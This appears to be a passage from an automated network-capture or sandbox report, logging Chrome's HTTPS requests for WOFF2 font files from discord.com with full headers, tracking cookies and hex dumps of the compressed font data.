                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 22 fe c9 8b fa 3e 48 11 c2 bb ef 03 4b 48 64 04 a9 19 8c 44 84 44 86 18 12 ad 64 70 33 03 38 a0 47 cf 4c 61 b6 40 57 ff 64 de 01 5b 27 c8 7f 76 01 e7 bf 07 08 80 c0 89 f2 bf 58 2c d7 ff 2f 57 80 24 0c e8 c2 85 88 88 90 88 88 8c 88 8c c8 48 d5 b0 b5 24 4d 9c 9e 61 be 84 20 e1 a9 78 ce f0 c0 b5 af e2 90 0e a4 fb 72 8e ea 85 ea 4c 1b 38 b8 e1 c0 0e 34 dc e7 d8 a2 00 a1 17 4a 98 c8 17 5a 17 6a 34 13 c2 67 bd 86 77 d7 81 49 1e 5c 84 d1 41 78 20 f4 5d 1f 57 e8 22 04 20 1b 6a e0 ae 41 ef a6 f7 23 86 da 84 b6 7f 9c e2 07 e9 0a 30 ba 89 6e 43 84 aa 0a a4 57 8e 67 da 40 e1 0d af 03 8b e1 42 60 af c4 54 59 e0 1b 88 ed c0 5f 39 bc 48 e2 05 ae 8d 30 3e 3a 08 44 08 42 07 a9 53 95 14 e4 08 32 c5 2c b6 30 f5 55 5e 7a 17 ff 40 5a 00 45 40 7d a1 02 6b b1 f5 73 68 83 67 da
                                                                                                                                                                                                                                                                                    Data Ascii: ">HKHdDDdp38GLa@Wd['vX,/W$H$Ma xrL84JZj4gwI\Ax ]W" jA#0nCWg@B`TY_9H0>:DBS2,0U^z@ZE@}kshg
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 43 94 28 03 53 49 16 54 6a ab 40 a3 4e 81 4a dd 80 5a 59 1b f2 d2 01 28 1d 6f c5 5e 3a 81 56 a0 c5 15 1d 03 d6 f0 3f 7a 13 4c 5c a7 29 2c dc a0 c2 a1 c4 62 e3 e0 e2 ed fa b8 49 57 03 97 9d 46 7b fe 26 20 ba d9 05 2a dd 52 80 e8 d6 80 5a 7f 30 21 12 e8 93 8e cf 59 b4 3d 08 7a 6b 7f 36 51 fe bc 0b 08 7f 21 40 ab 26 10 82 07 35 95 26 02 81 1a c1 e1 b0 ba 0a 4a 40 69 ab 53 13 4e e7 2f fd af 79 b5 2c 50 d0 95 55 c1 d4 ae 51 50 e8 01 bd 5a ef 85 5a 17 15 04 85 be 42 21 e1 49 4c 37 00 83 43 d6 fe 65 06 74 90 38 53 d4 5d 8d 3c 45 e4 c9 aa f2 03 94 11 fa 34 c6 ca df 87 9a e3 6c 74 72 2e 6b 8a 80 63 62 e1 10 e0 ee 16 b8 49 37 42 05 09 11 b2 31 f0 90 d7 a6 09 ff eb 02 a6 9f 14 cc 78 63 a0 80 1b e7 53 8f 8f 51 30 e2 e3 05 2d 3e 51 30 e2 93 81 36 f1 cd 2e c1 0d 28 ec
                                                                                                                                                                                                                                                                                    Data Ascii: C(SITj@NJZY(o^:V?zL\),bIWF{& *RZ0!Y=zk6Q!@&5&J@iSN/y,PUQPZZB!IL7Cet8S]<E4ltr.kcbI7B1xcSQ0->Q06.(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 61 64 ba e9 bf cc 59 e9 4f da 54 4d 7a 5c bc 36 cc bd 2c dc bc 76 37 9b cb 62 3e f0 56 02 15 5e e7 5a 9c 84 8c ba 34 91 cd 3a 97 61 56 99 34 b2 ff c5 2b ef 58 4c cb e8 0b 9a 8d 2f 49 f9 93 5b 3f 6d bb c8 69 c9 1c cd cd 3c 8d cb e2 6d ec a1 cd 09 bb 29 fd 17 95 9f d2 a8 26 8e b3 50 10 99 64 3f 65 de 16 19 39 5b 63 cb a8 9e 64 e4 8c e4 93 87 37 41 db 5c 8c b9 5e 08 8e a9 48 fd 6d 0e db 9c 8e b9 a2 39 6f 00 b3 f8 64 19 67 52 22 cc a9 93 5c 92 ee 35 85 07 ee 28 55 43 85 f7 4e 5a 91 76 32 04 21 86 29 96 c9 36 b4 ee d5 d8 1a ec 17 b0 31 12 2a 15 e4 b3 d7 7b 5c 95 9a 4a df 42 d9 e5 e4 14 c2 aa 6f 0d 6b 0d ad 6c 27 9b 56 89 e0 57 4a ff b7 0a 85 aa c2 02 3d 09 32 ce 0e 0e 80 21 f2 9b 01 29 04 10 af 62 aa 5b a5 23 c5 b3 4a 69 ac 14 35 b8 ae bd e2 69 64 6f 48 91 ee
                                                                                                                                                                                                                                                                                    Data Ascii: adYOTMz\6,v7b>V^Z4:aV4+XL/I[?mi<m)&Pd?e9[cd7A\^Hm9odgR"\5(UCNZv2!)61*{\JBokl'VWJ=2!)b[#Ji5idoH
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: d2 ac 85 09 11 ed bc ec fd 36 16 ad 26 56 56 00 11 14 60 4d 0b 9c b4 13 b8 2f 87 34 ed 97 58 bf f7 b9 8b 92 a7 c9 8a 5f b3 5e 13 92 e4 a8 d0 08 6f c4 8c 75 c7 88 04 7d 5f 0b 31 70 5a f4 dc aa b4 e8 b3 56 b2 5c 95 9a f4 18 35 6b c3 c9 ac 91 c4 ef 6b 21 4e 81 36 03 8f 6a ad fa 4d 4a 91 a7 4a b3 5e 63 e6 6c 3a 45 24 fa fb 5a c0 28 d2 61 54 2c a0 cd 80 75 52 e5 ab d6 e2 9b 71 7f 6c 39 43 24 03 fc 5a 48 50 a2 cb c4 ab 46 bb 41 eb a5 29 50 a3 d5 77 3f cc db 76 8e 48 18 f8 b5 90 a4 4c 8f 59 89 a0 0e 43 a6 a4 2b 54 0b a7 cf 4f 0b 76 5c 20 92 0a 7e 2d a4 a8 40 b2 f0 a9 d5 69 58 54 86 22 75 da 10 fc b2 68 d7 25 22 f1 e0 d7 42 9a 2a 14 ab 52 75 ba 8c 98 f6 49 b1 2f da f5 fb 6d c9 9e 2b 44 72 c2 98 bf 52 32 d4 e8 b3 29 53 af db a8 78 99 4a d4 eb 30 60 c2 b2 7d d7 68
                                                                                                                                                                                                                                                                                    Data Ascii: 6&VV`M/4X_^ou}_1pZV\5kk!N6jMJJ^cl:E$Z(aT,uRql9C$ZHPFA)Pw?vHLYC+TOv\ ~-@iXT"uh%"B*RuI/m+DrR2)SxJ0`}h


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    40192.168.2.549763162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC909OUTGET /assets/452d7be36bf4b23241bd.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.css
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                                    Content-Length: 139388
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0b1186c4385-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "db985aaa3c64f10506d96d876e350d47"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 06 Jan 2023 01:15:23 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2FlUMTVgK%2BI%2FXORzcznQkynSGo%2FLs2HzsDmxZ01kqtqU04VinbSaKr%2BgkxbVx80G%2FGTyzBRAjsCqlZeDUpLm18h2VCS0XDMERTqsX2lwJnczMBsyMlUDjUxwbMdk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 02 20 7c 00 0f 00 00 00 06 39 84 00 02 20 1b 00 02 01 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 8b 66 1b 84 bc 76 1c d3 04 06 60 00 95 1a 11 08 0a 8f 8e 18 8c 96 65 01 36 02 24 03 f3 54 0b f3 58 00 04 20 05 8a 7c 07 82 bd 5b 0c 07 5b f2 42 b5 cf 7f 63 dc 7b bd ab ca ee 3a ec 77 e9 06 54 0a 6c 1b db 86 04 43 d3 54 2b cf d8 ef 47 93 a0 c6 18 de 1b 02 46 e5 5c 73 1a c7 a8 bb 6d 8c f0 4a 0f 6e 60 eb b6 d2 f1 d0 79 03 f3 aa 36 f2 3c a5 e9 ff ff ff ff ff ff ff ff ff ff ff bf 97 e4 c7 63 9b bd 99 9f cc fc 23 17 e1 08 97 01 82 c8 a1 15 b0 1e d4 0b 6d d5 b6 bb 6e b7 10 85 75 b0 ce 23 24 48 e1 02 2b 19 94 cb 19 31 29 94 6f 71 b6 6c d3 8e 40 b5 0b e9 55 85 87 eb 23 54 70 50 0c fc 10 43 ef c9 88 58 6b 89 60 9c 6b c0
                                                                                                                                                                                                                                                                                    Data Ascii: wOF2 |9 fv`e6$TX |[[Bc{:wTlCT+GF\smJn`y6<c#mnu#$H+1)oql@U#TpPCXk`k
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 84 9b f9 33 bf a9 a6 fb 4c 85 6e de 76 7b fe fd 26 e2 4c 8d be 89 d2 f6 dd 49 f1 00 09 16 24 e0 11 c4 2e 01 02 59 5a 43 ff bf a8 d0 d5 b5 03 02 39 96 ae 6a c2 30 18 c7 7e c2 d7 4e 01 26 87 e1 01 7e b9 fd 5b 10 8b ab dc 6e 75 5d ef fa c5 c5 bb 8e 6d 77 b7 5b 34 0b 18 8c c1 e8 16 44 44 25 0c 0c 04 3b f0 8b 60 d4 ff 06 46 62 f6 d7 af f7 8f 57 48 dc c3 2f 15 a4 d2 d3 67 d2 59 65 e6 17 5d 00 dd 32 b3 81 b6 0a 4e a0 13 68 03 6d fc b2 1f b2 0f 9a f3 83 e5 6e 31 3d ec c0 6b 12 a8 a4 0a 55 49 c5 02 fe 2f 70 fd 24 21 35 0f 15 bb d2 9f 8a 5b 08 ad f3 1b 2a 16 6a 9a 8a e6 a5 03 15 3d a7 56 1b 08 1e 82 7d 21 57 5f 94 9f d5 a7 50 bd be 7f cd 02 87 d1 62 58 11 f6 64 e8 3f 16 e8 76 f7 5d 93 6b 5a 81 b4 4c 07 8f d1 08 e1 d1 36 7f 99 a6 8d 5b 87 3d 0f 4d 49 d2 ba 79 b8 e7
                                                                                                                                                                                                                                                                                    Data Ascii: 3Lnv{&LI$.YZC9j0~N&~[nu]mw[4DD%;`FbWH/gYe]2Nhmn1=kUI/p$!5[*j=V}!W_PbXd?v]kZL6[=MIy
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 7a cd f0 7e 51 94 ff 38 d6 14 6d 4f f8 31 d8 a2 fd 7e c8 f2 4c 5e 85 d5 6c 76 9e 98 76 b3 4c db a9 fd 2c ff 72 e6 ff b7 e9 67 3b d7 b0 3b 63 07 f4 82 5a b6 b2 ab 73 ac a0 9d 2d 1a c0 36 67 db 9c 74 e9 52 f1 cc 7d d2 68 ee 3c cf 97 64 ad ff 6a 66 3e 59 1f 47 5a f0 48 4b 63 2d 49 b6 ff da bb 3f 84 1d 72 97 4e b0 24 2f 19 42 fe 0e 29 00 54 e5 a4 42 a8 89 8b 7e cf 56 81 aa 49 d3 12 96 39 29 aa 14 55 91 12 e9 ff 54 2d 5d ce e7 e0 4b 00 45 3e 4b 8b 4b 89 ce 72 48 45 45 e9 ce 31 54 2e dd 54 c4 ff 33 43 0e 07 b3 4c 80 b8 22 44 3d 9f 78 29 49 ba 14 48 4a 45 d8 f5 3d ca 29 b7 76 e7 ce ed ed 3a f4 29 97 ae 6a 37 4d 61 ff 6b 56 4a 57 d6 ca 39 6e 16 06 37 e7 cd c8 e6 4b ad 17 8f 76 66 0f db 80 38 e1 a9 00 a6 df af 5b ad 95 34 e3 fb 02 14 85 b1 e9 b6 6f b4 30 07 60 21
                                                                                                                                                                                                                                                                                    Data Ascii: z~Q8mO1~L^lvvL,rg;;cZs-6gtR}h<djf>YGZHKc-I?rN$/B)TB~VI9)UT-]KE>KKrHEE1T.T3CL"D=x)IHJE=)v:)j7MakVJW9n7Kvf8[4o0`!
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: b9 59 08 ef eb 2d 60 60 df 6d c2 d0 7e d8 86 91 fd 6b 15 e3 fb 7f 26 60 3a 70 2a 04 b0 90 28 2a 1a 60 25 f8 10 b0 15 72 c4 28 46 1a 29 0e 25 3e 5e 1c 4e 7e 02 b8 23 8d 69 c3 5d e9 ca 24 3c 90 c1 e4 e3 31 00 77 07 d7 ba b6 b5 af e3 a1 7f 89 17 7d e6 e4 53 92 93 9e 6c 48 b4 ee 8e c5 43 ec d7 97 00 b2 1d 5b 37 b8 f6 c7 0d 82 6f 7f d9 28 04 f7 c9 72 10 da e7 2b e2 da be da 1c c4 f6 ed 02 46 f7 fd 66 8c ed 9f db 31 1e 18 15 0c 98 48 24 15 05 30 19 24 15 13 a6 42 0c 11 0b 2d fe 7e 2c 86 16 3e 96 23 89 04 e5 c8 62 45 25 f6 78 71 2a fe e4 e1 7c 82 09 e2 5a ba 32 0e d7 33 31 fd 68 f7 79 3c ee de f6 97 8f 07 f7 68 48 a4 51 83 ad 9e 9e 55 23 09 bb 1d df 9a d5 c0 a3 fb 00 a0 d7 57 20 52 f8 e5 b1 09 1c 9d e2 64 0e 09 fe 66 e4 55 fe df c6 a9 e6 1c b3 ae d8 fc 83 26 95
                                                                                                                                                                                                                                                                                    Data Ascii: Y-``m~k&`:p*(*`%r(F)%>^N~#i]$<1w}SlHC[7o(r+Ff1H$0$B-~,>#bE%xq*|Z231hy<hHQU#W RdfU&
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 86 d9 cf 90 8b 57 86 4a 20 9c 0b 56 f3 b2 e9 c8 77 c9 dc d3 b8 ed 25 9c ec 7e 14 fd 71 5a dc f3 da d8 f0 33 02 b7 b8 e9 32 37 4f 91 1d 2b 78 20 5a e3 c2 1b ce 35 60 45 8d c0 6e 24 9d cb fd cd 1d 3e da ec 8c d6 e7 cf cb 4a c6 f2 79 99 64 81 16 54 01 89 60 6a e9 c3 97 ef 81 4a 8c 5c 5a c7 e1 3c a9 50 c5 48 e9 18 66 22 f2 c7 ef bf f1 da 02 a7 c7 ef 86 3e 7a 4f cc e4 cb 13 01 c0 55 e8 f6 fb a4 5a 24 c6 c7 f3 96 12 6b 4b db 7d 7e ae 41 56 73 c4 83 b3 cf f2 60 b2 55 49 40 40 88 b1 a6 7a 3b 0e 39 b9 e0 31 bd b7 61 e1 f8 4c 5d 88 97 62 cc 5f af 91 0c 4f 33 d1 09 5e e0 f3 4c 76 6a fe b6 23 ab ec a2 70 0c be 64 bb bb 93 d2 81 0e 7f be a8 b7 5a 73 d3 91 a3 80 04 78 2f 4d 78 87 50 8b 63 24 5e 98 dc 3b 39 f2 f2 7c 75 2d 77 87 7f a5 89 f0 05 46 ce d8 45 b5 67 f6 77 f1
                                                                                                                                                                                                                                                                                    Data Ascii: WJ Vw%~qZ327O+x Z5`En$>JydT`jJ\Z<PHf">zOUZ$kK}~AVs`UI@@z;91aL]b_O3^Lvj#pdZsx/MxPc$^;9|u-wFEgw
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 07 d0 a1 91 2e a7 d7 f3 d9 53 3a a5 e0 b9 42 44 52 6e 4c 05 e2 bc 4c 87 1e 83 66 fc 42 3f dc ab 9a 83 ee d9 43 27 bd 32 9e 3a a5 e0 41 21 22 79 f3 6d ca b5 54 50 1e 95 3c a6 9d e6 64 8c b1 63 60 50 9e d3 93 fa ed 2b f1 ce 37 72 a5 12 c2 7f a7 21 c0 cf 2e 43 6e ae 0c a9 9f 58 db 7e 6c 77 f7 c9 52 61 33 f2 0f 2c bc b0 75 9f b0 08 71 66 3c 96 ac a5 48 cb 2c 64 ab c8 ea 7f 59 8b ba db d3 6d 78 17 e4 91 52 46 53 07 d9 99 cb 3e ff cc c2 9c a5 28 57 e1 73 36 f4 6c 24 9b d1 a1 fb 5b e3 17 fe e2 54 64 24 46 81 2a 75 c7 33 e3 7f b3 4c c6 2c 33 fb 74 34 ee e9 63 f9 1e c1 8b d8 b3 e2 61 32 91 c4 22 4f 51 16 9f aa 56 ab 2e db d0 61 24 c7 d6 f9 0d 93 b9 0c 62 6e 61 c7 5e 7e 7f 76 e0 f0 ec 5f 79 d7 e7 af d3 cf 7d cd 7e f2 ac 5b bd 1a 85 ff 3e c4 bd 33 cc a6 e3 3b 7f 40
                                                                                                                                                                                                                                                                                    Data Ascii: .S:BDRnLLfB?C'2:A!"ymTP<dc`P+7r!.CnX~lwRa3,uqf<H,dYmxRFS>(Ws6l$[Td$F*u3L,3t4ca2"OQV.a$bna^~v_y}~[>3;@
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: ab b8 ac 9c bc 82 a2 92 b2 1d bb f6 5a 0e 1d 3d a6 43 dd e8 80 86 b4 00 39 81 7a 48 02 0d 50 b4 09 68 a9 12 89 76 12 c9 c1 e3 d5 13 16 c8 84 c2 06 12 0a bf 52 29 d6 68 1a c8 68 0b 3a 5d 03 39 a3 1e 04 89 26 b3 c0 62 f1 5b ad 1c 9b 0d b1 db dd 4e 67 1d 2d 57 35 1d ac 9a ae 37 11 0a d9 62 f1 6a f7 92 e6 74 5a 9d cd 11 d8 e6 6d 85 02 81 43 97 7b 74 34 3a 33 b3 80 df aa c8 ba 08 a4 8f 1f c5 f7 61 50 12 53 50 d2 d2 50 d2 b3 e8 8e e3 b8 6f c8 b6 bb a9 88 52 71 31 a4 b4 02 f2 f9 33 d7 b9 6a 48 6d 03 a4 a9 09 d2 de 4e ab 83 00 3a c9 b9 2e 6a a4 9b 1e ea 61 46 7a d9 a1 3e 6e a4 9f 1f 1a 10 f0 ff 48 f8 45 05 bf a4 e1 2f 1b 63 e3 e6 e3 ab d6 d8 94 0b cc f8 c0 5c 08 2c c4 c0 52 0a 7c 3f ae bf 39 af 7f d3 dc fa 1d b9 fc 27 b6 ff 6f 6a ff ff b9 fd ff ee c7 b0 9d 78 7b
                                                                                                                                                                                                                                                                                    Data Ascii: Z=C9zHPhvR)hh:]9&b[Ng-W57bjtZmC{t4:3aPSPPoRq13jHmN:.jaFz>nHE/c\,R|?9'ojx{
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: d1 a6 41 de d3 1d 00 a2 89 9d 00 45 6f 76 0a ac fd 77 1b ac be ec 10 38 00 17 60 0d 84 20 07 e2 09 47 c0 81 13 13 8d a0 01 70 66 c6 0b 24 0d e9 81 43 23 7a 21 e9 c8 52 1c 64 3d 3b d1 c4 5e 8e 47 1f 27 70 00 2e f3 98 8f 1a bf 60 01 aa dc c4 42 d4 f8 25 8b 51 e5 6e 36 c1 65 1b db e0 b2 9d 5d 50 e0 19 f6 83 9f 97 68 c7 0d 5e a7 1f 4c fc 89 11 48 f2 57 26 21 c1 27 e4 20 2f b7 dc d8 54 be f2 71 ca 1b 9c d7 9c 4d b9 4f de 96 72 9f 3e 8a f2 7f fc 35 ce f7 1f dd 28 04 01 07 50 04 22 1a 40 08 04 04 20 74 74 10 b9 66 10 33 1e 48 90 04 24 4b 05 52 a7 03 e9 b2 82 52 43 28 7b 5b ca d9 de 19 a1 a1 4e 8b 8a a2 76 c6 b6 e8 97 cd 19 6f 46 7a c6 59 9d 1b b4 ad 0e a7 7b 7b 63 87 0e 75 dc b0 61 0a 96 b1 46 bc ae f5 8e 66 8f 86 90 19 8a 32 43 d3 d6 78 3c 23 7c be 39 81 c0 88
                                                                                                                                                                                                                                                                                    Data Ascii: AEovw8` Gpf$C#z!Rd=;^G'p.`B%Qn6e]Ph^LHW&!' /TqMOr>5(P"@ ttf3H$KRRC({[NvoFzY{{cuaFf2Cx<#|9
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 05 0b 17 ba b0 9d 2f 70 e0 c4 1d 3c c5 0e de 4b 05 41 57 08 11 26 e2 3a 89 90 6c 66 23 6b 3d c5 28 5d 24 42 bd 54 a3 bd 35 d0 a9 1b d2 ce 00 63 3c 7f 4e 73 fc 39 7d dd af 1f ca 18 ff 72 98 b7 77 a4 a3 1c ed 98 3c f6 92 e0 b8 38 be ec e1 84 33 42 e7 94 6b 01 e0 bf 8b 41 3c 2d 0c b4 38 72 5d ba b3 e7 34 10 bd e5 1a 63 5c 75 f6 7b e9 1c 70 d2 39 69 8d ce c9 ee b9 3e e8 4d 15 99 b2 16 e7 b0 1b 1e 66 a6 ea 6a 80 56 cb bb c4 6a ee 3d 12 f6 f7 91 d8 b4 25 49 7b 5d 48 f6 b4 55 a6 6e 55 96 9e 3f 93 ed 53 bd c8 f5 b5 41 94 18 62 14 75 a2 4d a6 cd 54 d3 21 98 6d 3e c3 ce af fa 66 71 4c 94 0a a6 fd 69 b3 31 77 d1 c8 fc 8b e5 3e cb 7e af 03 ee ba ec 61 a9 c3 cb 15 eb 9d 95 b9 ea f0 1c ab 47 99 66 8d b3 2e b2 de 15 89 6c 71 cd 0d 1a dc 72 87 1d fe 71 ec 6e f3 87 3d 1e
                                                                                                                                                                                                                                                                                    Data Ascii: /p<KAW&:lf#k=(]$BT5c<Ns9}rw<83BkA<-8r]4c\u{p9i>MfjVj=%I{]HUnU?SAbuMT!m>fqLi1w>~aGf.lqrqn=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 55 5b ea 00 7f aa 99 5a 80 48 5a 84 45 43 d1 7b 7e f5 18 40 41 97 63 af a7 fb e6 be 2f 03 2f e1 2b af c2 b6 a9 c3 0f b1 87 e4 43 c6 11 89 f1 80 84 b7 aa fb fb cd 09 d8 ab 45 fa f3 00 b9 91 db 47 a4 66 fe 51 ff a3 7b f8 00 96 63 30 57 a1 11 d2 1c c6 8d ff 58 20 3d ec 3f 4b a1 1a ea 20 7a 3e f0 e3 7f 56 76 f2 4e db 99 3b a7 88 3c a7 5b 9b 23 3c a2 22 16 6a fd a1 55 bb a0 34 3f f6 8d 6f 83 d5 28 76 94 e0 0d 81 10 de d6 3b 9a ab 05 00 db 54 1b b5 ff a2 9f 40 8e f6 f5 85 a3 c9 0f e9 8f c3 d0 98 a6 6e 9e b8 29 54 bb f5 3f 2e 3d 65 36 39 e2 5e e7 02 7b 0f ca 66 64 e2 ee 90 ed ba c1 51 5d fb 55 bb da 82 d3 88 c2 fe fd a5 3c 4f b4 2a ff e3 d6 d3 f0 45 a9 09 52 e7 59 f7 54 bb f2 3f 1e c6 04 e6 76 02 01 15 41 e2 e0 89 5b 83 b6 5b ff 54 f4 94 e3 11 ea 8a db 3d c0 32
                                                                                                                                                                                                                                                                                    Data Ascii: U[ZHZEC{~@Ac//+CEGfQ{c0WX =?K z>VvN;<[#<"jU4?o(v;T@n)T?.=e69^{fdQ]U<O*ERYT?vA[[T=2


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    41192.168.2.549766162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC909OUTGET /assets/48a594e29497835802fe.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.css
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC956INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                                    Content-Length: 179380
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0b11d37de94-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "7cf1be7696bf689b97230262eade8ad8"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 06 Jan 2023 01:15:24 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyvsyhLpDD3qAAFtmvIMs0J6RtVQ4RmXAIcpO%2F3pIVgLKA8PdbSU1fqIJqjw46qVMdGQTlEnO%2BektWtudPgyvI5SRigGgYLQ2dvut017FyHV7G65kcm9mhsCkcAt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
